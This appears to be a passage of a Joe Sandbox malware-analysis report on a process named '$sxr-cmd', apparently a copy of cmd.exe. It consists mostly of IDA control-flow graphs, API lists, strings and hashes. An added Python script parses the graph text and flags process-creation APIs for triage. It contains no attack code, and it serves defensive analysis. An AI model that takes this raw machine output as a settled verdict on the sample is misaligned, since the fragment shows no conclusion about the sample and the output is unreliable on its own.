                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: wcschr$Heap$AllocateProcessiswspacememsettowlowerwcsrchr
                                                                                                                      • String ID: :$:$:$:ON$OFF
                                                                                                                      • API String ID: 4076514806-467788257
                                                                                                                      • Opcode ID: a6a58be8637e266a7619168a34d09a9f7236abb5197162b465aafe4d5ad54b4e
                                                                                                                      • Instruction ID: d146bf741067b64ba0c05be071ec1723fe97f07d8b27d4e954a48ff26c839962
                                                                                                                      • Opcode Fuzzy Hash: a6a58be8637e266a7619168a34d09a9f7236abb5197162b465aafe4d5ad54b4e
                                                                                                                      • Instruction Fuzzy Hash: BB22C529A08E43C6EB549F299454279E6A1EF49FB4F498036CA0EC77B5DF7CAC44C350
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 398 7ff6155051ec-7ff615505248 call 7ff615505508 GetLocaleInfoW 401 7ff61550524e-7ff615505272 GetLocaleInfoW 398->401 402 7ff61550ef32-7ff61550ef3c 398->402 403 7ff615505295-7ff6155052b9 GetLocaleInfoW 401->403 404 7ff615505274-7ff61550527a 401->404 405 7ff61550ef3f-7ff61550ef49 402->405 408 7ff6155052de-7ff615505305 GetLocaleInfoW 403->408 409 7ff6155052bb-7ff6155052c3 403->409 406 7ff615505280-7ff615505286 404->406 407 7ff6155054f7-7ff6155054f9 404->407 410 7ff61550ef4b-7ff61550ef52 405->410 411 7ff61550ef61-7ff61550ef6c 405->411 406->407 412 7ff61550528c-7ff61550528f 406->412 407->402 415 7ff615505321-7ff615505343 GetLocaleInfoW 408->415 416 7ff615505307-7ff61550531b 408->416 413 7ff6155052c9-7ff6155052d7 409->413 414 7ff61550ef75-7ff61550ef78 409->414 410->411 417 7ff61550ef54-7ff61550ef5f 410->417 411->414 412->403 413->408 420 7ff61550ef99-7ff61550efa3 414->420 421 7ff61550ef7a-7ff61550ef7d 414->421 418 7ff61550efaf-7ff61550efb9 415->418 419 7ff615505349-7ff61550536e GetLocaleInfoW 415->419 416->415 417->405 417->411 423 7ff61550efbc-7ff61550efc6 418->423 424 7ff615505374-7ff615505396 GetLocaleInfoW 419->424 425 7ff61550eff2-7ff61550effc 419->425 420->418 421->408 422 7ff61550ef83-7ff61550ef8d 421->422 422->420 426 7ff61550efc8-7ff61550efcf 423->426 427 7ff61550efde-7ff61550efe9 423->427 429 7ff61550539c-7ff6155053be GetLocaleInfoW 424->429 430 7ff61550f035-7ff61550f03f 424->430 428 7ff61550efff-7ff61550f009 425->428 426->427 432 7ff61550efd1-7ff61550efdc 426->432 427->425 433 7ff61550f00b-7ff61550f012 428->433 434 7ff61550f021-7ff61550f02c 428->434 435 7ff6155053c4-7ff6155053e6 GetLocaleInfoW 429->435 436 7ff61550f078-7ff61550f082 429->436 431 7ff61550f042-7ff61550f04c 430->431 437 7ff61550f04e-7ff61550f055 431->437 438 7ff61550f064-7ff61550f06f 431->438 432->423 432->427 433->434 440 7ff61550f014-7ff61550f01f 433->440 
434->430 441 7ff61550f0bb-7ff61550f0c5 435->441 442 7ff6155053ec-7ff61550540e GetLocaleInfoW 435->442 439 7ff61550f085-7ff61550f08f 436->439 437->438 443 7ff61550f057-7ff61550f062 437->443 438->436 444 7ff61550f0a7-7ff61550f0b2 439->444 445 7ff61550f091-7ff61550f098 439->445 440->428 440->434 446 7ff61550f0c8-7ff61550f0d2 441->446 447 7ff615505414-7ff615505436 GetLocaleInfoW 442->447 448 7ff61550f0fe-7ff61550f108 442->448 443->431 443->438 444->441 445->444 452 7ff61550f09a-7ff61550f0a5 445->452 453 7ff61550f0ea-7ff61550f0f5 446->453 454 7ff61550f0d4-7ff61550f0db 446->454 449 7ff61550543c-7ff61550545e GetLocaleInfoW 447->449 450 7ff61550f141-7ff61550f14b 447->450 451 7ff61550f10b-7ff61550f115 448->451 455 7ff615505464-7ff615505486 GetLocaleInfoW 449->455 456 7ff61550f184-7ff61550f18b 449->456 459 7ff61550f14e-7ff61550f158 450->459 457 7ff61550f117-7ff61550f11e 451->457 458 7ff61550f12d-7ff61550f138 451->458 452->439 452->444 453->448 454->453 460 7ff61550f0dd-7ff61550f0e8 454->460 461 7ff61550548c-7ff6155054ae GetLocaleInfoW 455->461 462 7ff61550f1c4-7ff61550f1ce 455->462 466 7ff61550f18e-7ff61550f198 456->466 457->458 463 7ff61550f120-7ff61550f12b 457->463 458->450 464 7ff61550f15a-7ff61550f161 459->464 465 7ff61550f170-7ff61550f17b 459->465 460->446 460->453 469 7ff61550f207-7ff61550f20e 461->469 470 7ff6155054b4-7ff6155054f5 setlocale call 7ff615508f80 461->470 471 7ff61550f1d1-7ff61550f1db 462->471 463->451 463->458 464->465 472 7ff61550f163-7ff61550f16e 464->472 465->456 467 7ff61550f19a-7ff61550f1a1 466->467 468 7ff61550f1b0-7ff61550f1bb 466->468 467->468 473 7ff61550f1a3-7ff61550f1ae 467->473 468->462 477 7ff61550f211-7ff61550f21b 469->477 475 7ff61550f1dd-7ff61550f1e4 471->475 476 7ff61550f1f3-7ff61550f1fe 471->476 472->459 472->465 473->466 473->468 475->476 479 7ff61550f1e6-7ff61550f1f1 475->479 476->469 480 7ff61550f21d-7ff61550f224 477->480 481 7ff61550f233-7ff61550f23e 477->481 479->471 479->476 480->481 482 7ff61550f226-7ff61550f231 480->482 482->477 
482->481
                                                                                                                       Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoLocale$DefaultLangUsersetlocale
                                                                                                                      • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                                      • API String ID: 2492766124-2236139042
                                                                                                                      • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                                      • Instruction ID: c7bb275156862b23c00f844e8319e9f7dfb6336e53bdbdde5b5e18d0aa6e3428
                                                                                                                      • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                                      • Instruction Fuzzy Hash: 36F13069B08B4285EF218F21E5502B9A6A5BF44FA8F954136CA1DC77B4EF3CED05C300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 483 7ff615504224-7ff6155042a5 InitializeProcThreadAttributeList 484 7ff6155042ab-7ff6155042e5 UpdateProcThreadAttribute 483->484 485 7ff61550ecd4-7ff61550ecee GetLastError call 7ff615519eec 483->485 487 7ff61550ecf0-7ff61550ed19 GetLastError call 7ff615519eec DeleteProcThreadAttributeList 484->487 488 7ff6155042eb-7ff6155043c6 memset * 2 GetStartupInfoW call 7ff615503a90 call 7ff6154fb900 484->488 492 7ff61550ed1e 485->492 487->492 497 7ff6155043cc-7ff6155043d3 488->497 498 7ff615504638-7ff615504644 _local_unwind 488->498 499 7ff615504649-7ff615504650 497->499 500 7ff6155043d9-7ff6155043dc 497->500 498->499 499->500 501 7ff615504656-7ff61550465d 499->501 502 7ff615504415-7ff615504424 call 7ff615505a68 500->502 503 7ff6155043de-7ff6155043f5 wcsrchr 500->503 501->502 504 7ff615504663 501->504 510 7ff61550442a-7ff615504486 CreateProcessW 502->510 511 7ff615504589-7ff615504590 502->511 503->502 506 7ff6155043f7-7ff61550440f lstrcmpW 503->506 504->500 506->502 507 7ff615504668-7ff61550466d call 7ff615519044 506->507 507->502 513 7ff61550448b-7ff61550448f 510->513 511->510 514 7ff615504596-7ff6155045fa CreateProcessAsUserW 511->514 515 7ff615504495-7ff6155044c0 CloseHandle call 7ff61550498c 513->515 516 7ff615504672-7ff615504682 GetLastError 513->516 514->513 518 7ff6155044c5-7ff6155044c7 515->518 519 7ff61550468d-7ff615504694 516->519 518->519 520 7ff6155044cd-7ff6155044e5 518->520 521 7ff6155046a2-7ff6155046ac 519->521 522 7ff615504696-7ff6155046a0 519->522 523 7ff6155047a3-7ff6155047a9 520->523 524 7ff6155044eb-7ff6155044f2 520->524 525 7ff6155046ae-7ff6155046b5 call 7ff6155097bc 521->525 526 7ff615504705-7ff615504707 521->526 522->521 522->525 528 7ff6155045ff-7ff615504607 524->528 529 7ff6155044f8-7ff615504507 524->529 541 7ff615504703 525->541 542 7ff6155046b7-7ff615504701 call 7ff61554c038 525->542 526->520 527 
7ff61550470d-7ff61550472a call 7ff6154fcd90 526->527 543 7ff61550473d-7ff615504767 call 7ff6155013e0 call 7ff615519eec call 7ff6154fff70 _local_unwind 527->543 544 7ff61550472c-7ff615504738 _local_unwind 527->544 528->529 532 7ff61550460d 528->532 533 7ff615504612-7ff615504616 529->533 534 7ff61550450d-7ff61550455e call 7ff615505cb4 call 7ff6155033f0 call 7ff61550498c 529->534 537 7ff61550476c-7ff615504773 532->537 539 7ff61550461c-7ff615504633 533->539 540 7ff6155047d7-7ff6155047df 533->540 567 7ff615504564-7ff615504579 call 7ff61550498c 534->567 568 7ff6155047ae-7ff6155047ca call 7ff6155033f0 534->568 537->529 548 7ff615504779-7ff615504780 537->548 545 7ff6155047f2-7ff61550483c call 7ff6154fff70 DeleteProcThreadAttributeList call 7ff615508f80 539->545 540->545 546 7ff6155047e1-7ff6155047ed CloseHandle 540->546 541->526 542->526 543->537 544->543 546->545 548->529 553 7ff615504786-7ff615504789 548->553 553->529 555 7ff61550478f-7ff615504792 553->555 555->523 560 7ff615504794-7ff61550479d call 7ff61551a250 555->560 560->523 560->529 567->545 576 7ff61550457f-7ff615504584 call 7ff61551a920 567->576 568->540 576->545
                                                                                                                       Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                                                      • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                                                      • API String ID: 388421343-2905461000
                                                                                                                      • Opcode ID: 535aaf602069f04d29d01d66ec7cc0283b4951f0e7199f2144b325fbc8c0e2e4
                                                                                                                      • Instruction ID: 1a9eaf86f3c5d8b43d8a11a8c2a7fd20f13a8630c0f4ca2dabe52a99ab0d69b7
                                                                                                                      • Opcode Fuzzy Hash: 535aaf602069f04d29d01d66ec7cc0283b4951f0e7199f2144b325fbc8c0e2e4
                                                                                                                      • Instruction Fuzzy Hash: 85F11D3AA09E82C6EA60DB11E4507BAFBA4FB85FA4F454136D94DC2675DF3CE845CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%
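The control_flow_graph line above is the text rendering of the IDA graph for the routine at 7ff615504224, the one whose blocks reach CreateProcessW and CreateProcessAsUserW. That flat token stream is hard to read by eye, so here is an added Python example, not part of the Joe Sandbox report or its IDA plugin, that parses the dump back into basic blocks and edges, lists which block calls which API, and walks the shortest path from the entry block to a watch-listed API so the call sequence leading to the process launch can be read in order. The token grammar (decimal block id, hex address or address range, API names, `call <addr>` for internal calls, `* n` repeat markers, `a->b` edges) is inferred from the dump as it appears on this page; the watch list and the truncated excerpt used as input are the example's own choices.

```python
"""Parse Joe Sandbox 'control_flow_graph' text as rendered on this report page and
recover block -> API mappings and the API sequence along a path between blocks.

Added example; not code from the Joe Sandbox report or its IDA plugin. The token
grammar is assumed from the visible dump: `<id> <hex>[-<hex>] {API | call <hex> | * <n>}*`
for blocks and `<id>-><id>` for edges, all whitespace separated."""
import re
from collections import defaultdict, deque

# Excerpt copied from the report's control_flow_graph dump for the routine starting at
# 7ff615504224 (the CreateProcessW / CreateProcessAsUserW routine), truncated after block 514.
CFG_EXCERPT = (
    "control_flow_graph 483 7ff615504224-7ff6155042a5 InitializeProcThreadAttributeList "
    "484 7ff6155042ab-7ff6155042e5 UpdateProcThreadAttribute 483->484 "
    "485 7ff61550ecd4-7ff61550ecee GetLastError call 7ff615519eec 483->485 "
    "487 7ff61550ecf0-7ff61550ed19 GetLastError call 7ff615519eec DeleteProcThreadAttributeList 484->487 "
    "488 7ff6155042eb-7ff6155043c6 memset * 2 GetStartupInfoW call 7ff615503a90 call 7ff6154fb900 484->488 "
    "492 7ff61550ed1e 485->492 487->492 "
    "497 7ff6155043cc-7ff6155043d3 488->497 498 7ff615504638-7ff615504644 _local_unwind 488->498 "
    "499 7ff615504649-7ff615504650 497->499 500 7ff6155043d9-7ff6155043dc 497->500 498->499 499->500 "
    "501 7ff615504656-7ff61550465d 499->501 502 7ff615504415-7ff615504424 call 7ff615505a68 500->502 "
    "503 7ff6155043de-7ff6155043f5 wcsrchr 500->503 501->502 504 7ff615504663 501->504 "
    "510 7ff61550442a-7ff615504486 CreateProcessW 502->510 511 7ff615504589-7ff615504590 502->511 503->502 "
    "506 7ff6155043f7-7ff61550440f lstrcmpW 503->506 504->500 506->502 "
    "507 7ff615504668-7ff61550466d call 7ff615519044 506->507 507->502 "
    "513 7ff61550448b-7ff61550448f 510->513 511->510 514 7ff615504596-7ff6155045fa CreateProcessAsUserW 511->514"
)

# APIs worth flagging during triage of this dump; the list is this example's own choice.
WATCHLIST = {"CreateProcessW", "CreateProcessAsUserW", "VirtualAlloc", "LoadLibraryA", "OpenThread"}

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")


def parse_cfg(text):
    """Return (nodes, edges): nodes maps block id -> {'range': str, 'ops': [(kind, name)]}
    where kind is 'api' for a named import/CRT call or 'call' for an internal address."""
    tokens = text.split()
    nodes, edges, cur, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:                                                  # edge 'a->b'
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif tok == "*":                                       # '* n': previous op repeated n times
            if cur is not None and nodes[cur]["ops"]:
                nodes[cur]["ops"].extend([nodes[cur]["ops"][-1]] * (int(tokens[i + 1]) - 1))
            i += 2
        elif tok == "call":                                    # 'call <addr>': internal function
            if cur is not None:
                nodes[cur]["ops"].append(("call", tokens[i + 1]))
            i += 2
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            cur = int(tok)                                     # new block '<id> <addr[-addr]>'
            nodes[cur] = {"range": tokens[i + 1], "ops": []}
            i += 2
        else:                                                  # any other token is an API name
            if cur is not None:
                nodes[cur]["ops"].append(("api", tok))
            i += 1
    return nodes, edges


def entry_blocks(nodes, edges):
    """Blocks with no predecessor in the parsed edges (the function entry once the dump is complete)."""
    targets = {b for _, b in edges}
    return sorted(n for n in nodes if n not in targets)


def api_calls(nodes):
    """API name -> sorted list of block ids calling it (internal 'call <addr>' ops are ignored)."""
    out = defaultdict(list)
    for nid in sorted(nodes):
        for kind, name in nodes[nid]["ops"]:
            if kind == "api" and nid not in out[name]:
                out[name].append(nid)
    return dict(out)


def flag_watchlist(nodes, watchlist=WATCHLIST):
    """api_calls() restricted to the watch-listed APIs that actually occur in the dump."""
    return {api: ids for api, ids in api_calls(nodes).items() if api in watchlist}


def shortest_path(edges, src, dst):
    """Breadth-first search over the edge list; block ids from src to dst, or None if unreachable."""
    succ = defaultdict(list)
    for a, b in edges:
        succ[a].append(b)
    parent, queue = {src: None}, deque([src])
    while queue:
        n = queue.popleft()
        if n == dst:
            path = []
            while n is not None:
                path.append(n)
                n = parent[n]
            return path[::-1]
        for m in succ[n]:
            if m not in parent:
                parent[m] = n
                queue.append(m)
    return None


def api_path(nodes, edges, src, dst):
    """API names, in block order, along the shortest src -> dst path (None if unreachable)."""
    path = shortest_path(edges, src, dst)
    if path is None:
        return None
    return [name for nid in path for kind, name in nodes.get(nid, {"ops": []})["ops"] if kind == "api"]


if __name__ == "__main__":
    nodes, edges = parse_cfg(CFG_EXCERPT)
    entry = entry_blocks(nodes, edges)[0]
    for api, ids in flag_watchlist(nodes).items():
        print(f"{api} in block(s) {ids}; APIs on entry path: {api_path(nodes, edges, entry, ids[0])}")
```

Paste any full control_flow_graph line from the report in place of the excerpt and the same functions apply. On this excerpt the path from block 483 to block 514 reads InitializeProcThreadAttributeList, UpdateProcThreadAttribute, memset, memset, GetStartupInfoW, CreateProcessAsUserW, which is the attribute-list setup followed by the alternate-user process launch that a triager would want to confirm before trusting the API ID line above it.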

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 579 7ff615505554-7ff6155055b9 call 7ff61550a640 582 7ff6155055bc-7ff6155055e8 RegOpenKeyExW 579->582 583 7ff6155055ee-7ff615505631 RegQueryValueExW 582->583 584 7ff615505887-7ff61550588e 582->584 585 7ff61550f248-7ff61550f24d 583->585 586 7ff615505637-7ff615505675 RegQueryValueExW 583->586 584->582 587 7ff615505894-7ff6155058db time srand call 7ff615508f80 584->587 591 7ff61550f24f-7ff61550f25b 585->591 592 7ff61550f260-7ff61550f265 585->592 588 7ff61550568e-7ff6155056cc RegQueryValueExW 586->588 589 7ff615505677-7ff61550567c 586->589 596 7ff61550f2b6-7ff61550f2bb 588->596 597 7ff6155056d2-7ff615505710 RegQueryValueExW 588->597 594 7ff615505682-7ff615505687 589->594 595 7ff61550f28b-7ff61550f290 589->595 591->586 592->586 593 7ff61550f26b-7ff61550f286 _wtol 592->593 593->586 594->588 595->588 599 7ff61550f296-7ff61550f2b1 _wtol 595->599 600 7ff61550f2bd-7ff61550f2c9 596->600 601 7ff61550f2ce-7ff61550f2d3 596->601 602 7ff615505712-7ff615505717 597->602 603 7ff615505729-7ff615505767 RegQueryValueExW 597->603 599->588 600->597 601->597 604 7ff61550f2d9-7ff61550f2f4 _wtol 601->604 605 7ff61550f2f9-7ff61550f2fe 602->605 606 7ff61550571d-7ff615505722 602->606 607 7ff61550579f-7ff6155057dd RegQueryValueExW 603->607 608 7ff615505769-7ff61550576e 603->608 604->597 605->603 611 7ff61550f304-7ff61550f31a wcstol 605->611 606->603 609 7ff6155057e3-7ff6155057e8 607->609 610 7ff61550f3a9 607->610 612 7ff615505774-7ff61550578f 608->612 613 7ff61550f320-7ff61550f325 608->613 614 7ff6155057ee-7ff615505809 609->614 615 7ff61550f363-7ff61550f368 609->615 624 7ff61550f3b5-7ff61550f3b8 610->624 611->613 618 7ff615505795-7ff615505799 612->618 619 7ff61550f357-7ff61550f35e 612->619 616 7ff61550f327-7ff61550f33f wcstol 613->616 617 7ff61550f34b 613->617 622 7ff61550f39a-7ff61550f39d 614->622 623 7ff61550580f-7ff615505813 614->623 620 
7ff61550f36a-7ff61550f382 wcstol 615->620 621 7ff61550f38e 615->621 616->617 617->619 618->607 618->619 619->607 620->621 621->622 622->610 623->622 625 7ff615505819-7ff615505823 623->625 626 7ff61550f3be-7ff61550f3c5 624->626 627 7ff61550582c 624->627 625->624 628 7ff615505829 625->628 629 7ff615505832-7ff615505870 RegQueryValueExW 626->629 627->629 630 7ff61550f3ca-7ff61550f3d1 627->630 628->627 631 7ff61550f3dd-7ff61550f3e2 629->631 632 7ff615505876-7ff615505882 RegCloseKey 629->632 630->631 633 7ff61550f433-7ff61550f439 631->633 634 7ff61550f3e4-7ff61550f412 ExpandEnvironmentStringsW 631->634 632->584 633->632 635 7ff61550f43f-7ff61550f44c call 7ff6154fb900 633->635 636 7ff61550f428 634->636 637 7ff61550f414-7ff61550f426 call 7ff6155013e0 634->637 635->632 639 7ff61550f42e 636->639 637->639 639->633
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: QueryValue$CloseOpensrandtime
                                                                                                                      • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                                      • API String ID: 145004033-3846321370
                                                                                                                      • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                      • Instruction ID: 62c83af0b90467dfc1e8ac8d8509e1bf25ec45b9c9a53301db2a69a8a7b1eae7
                                                                                                                      • Instruction Fuzzy Hash: F6E1423A51DE82C6E7508B20E45057AF7A0FB89F69F445136EA8EC2A78DF7CD945CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph
                                                                                                                      (control-flow graph not reproduced; the rendered graph marks blocks as Executed or Not Executed)
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                                      • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                                      • API String ID: 2624720099-1920437939
                                                                                                                      • Opcode ID: 07c46770a52c088c526de068ad2c2e0dd476b9e56bbee4b4c828f5b21f9523cf
                                                                                                                      • Instruction ID: f1cd82317c1d7db7b1e7c49ee7722f8d8ff65aea2d878c84ddd909f436c24570
                                                                                                                      • Instruction Fuzzy Hash: B2C1CF39E08E428AFB549B3494511B9FAA0FF49F78F55413AD90EC6AB2DF3CAC458700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph
                                                                                                                      (control-flow graph not reproduced; the rendered graph marks blocks as Executed or Not Executed)
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileFindFirstLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 873889042-0
                                                                                                                      • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                      • Instruction ID: 871bbf5850d6fb1d2945bb06bfb6c2891c4c769ce2bb32b985d9b30e3f2c9531
                                                                                                                      • Instruction Fuzzy Hash: 0B511D39A09F42C6E7408B11E454579FBA4FB8AFA5F499132CA5E83361DF3CE8548700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph
                                                                                                                      (control-flow graph not reproduced; the rendered graph marks blocks as Executed or Not Executed)
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                      • Instruction ID: 66b32be509cca29c5df98f217fdb8c02f1cc421bec29cd09510101d816db37c8
                                                                                                                      • Instruction Fuzzy Hash: 7D51D765B08A8285EA708F15E5442BAE690FB54FF8F954232DE6EC76F1DF3CE8458700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph
                                                                                                                      (control-flow graph not reproduced; the rendered graph marks blocks as Executed or Not Executed)
                                                                                                                      APIs
                                                                                                                      • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504D9A
